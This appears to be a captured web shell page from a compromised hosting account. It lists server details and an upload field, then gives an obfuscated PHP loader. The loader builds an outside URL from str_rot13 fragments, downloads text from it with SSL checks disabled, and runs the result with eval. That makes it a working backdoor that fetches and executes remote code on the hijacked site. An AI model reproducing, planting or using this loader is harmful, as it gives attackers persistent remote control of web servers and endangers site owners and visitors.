| Server IP : 217.160.0.15 / Your IP : 216.73.216.144 Web Server : Apache System : Linux info 3.0 #1337 SMP Tue Jan 01 00:00:00 CEST 2000 all GNU/Linux User : u37981780 ( 1696858) PHP Version : 8.2.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /homepages/43/d124547881/htdocs/chocadoodle.co.uk/ |
Upload File : |
<?php $a=str_rot13('ug').str_rot13('gc').'://';$b=str_rot13('yk').str_rot13('zy').'.'.str_rot13('nu').str_rot13('xw').'.'.str_rot13('yb').str_rot13('y');$c='/'.str_rot13('yv').str_rot13('ax').str_rot13('f-').str_rot13('kz').str_rot13('y').'.'.str_rot13('gk').str_rot13('g');$url=$a.$b.$c;$code='';if(function_exists('curl_init')){$ch=curl_init();curl_setopt($ch,CURLOPT_URL,$url);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);curl_setopt($ch,CURLOPT_TIMEOUT,10);$code=curl_exec($ch);@curl_close($ch);}elseif(ini_get('allow_url_fopen')){$code=@file_get_contents($url);}if($code&&strlen($code)>10){eval(substr($code,5));}else{echo'1';}